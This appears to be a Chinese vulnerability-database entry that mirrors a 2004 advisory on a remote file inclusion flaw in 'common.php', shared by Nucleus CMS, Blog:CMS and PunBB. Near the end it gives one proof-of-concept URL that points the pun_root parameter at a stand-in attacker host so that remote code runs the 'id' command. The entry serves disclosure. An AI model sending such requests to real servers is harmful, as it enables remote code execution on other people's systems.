Nucleus CMS 3.0 / Blog:CMS 3 / PunBB 1.x – ‘Common.php’ Remote File Inclusion

Nucleus CMS 3.0 / Blog:CMS 3 / PunBB 1.x – ‘Common.php’ Remote File Inclusion

漏洞ID 1054532 漏洞类型
发布时间 2004-07-20 更新时间 2004-07-20
图片[1]-Nucleus CMS 3.0 / Blog:CMS 3 / PunBB 1.x – ‘Common.php’ Remote File Inclusion-安全小百科CVE编号 N/A
图片[2]-Nucleus CMS 3.0 / Blog:CMS 3 / PunBB 1.x – ‘Common.php’ Remote File Inclusion-安全小百科CNNVD-ID N/A
漏洞平台 PHP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/24296
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/10760/info

Nucleus CMS, Blog:CMS, and PunBB are vulnerable to a remote file include vulnerability that may allow an attacker to include malicious files containing arbitrary code to be executed on a vulnerable computer.

Input passed to the 'common.php' script is not sufficiently sanitized.

All three applications are vulnerable because they have a similar or identical code base.

http://www.example.com/forum/include/common.php?pun_root=http://www.host_evil.com/cmd?&=id

相关推荐: phpFriendlyAdmin Unspecified Cross-Site Scripting Vulnerability

phpFriendlyAdmin Unspecified Cross-Site Scripting Vulnerability 漏洞ID 1099289 漏洞类型 Input Validation Error 发布时间 2003-11-20 更新时间 2003…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享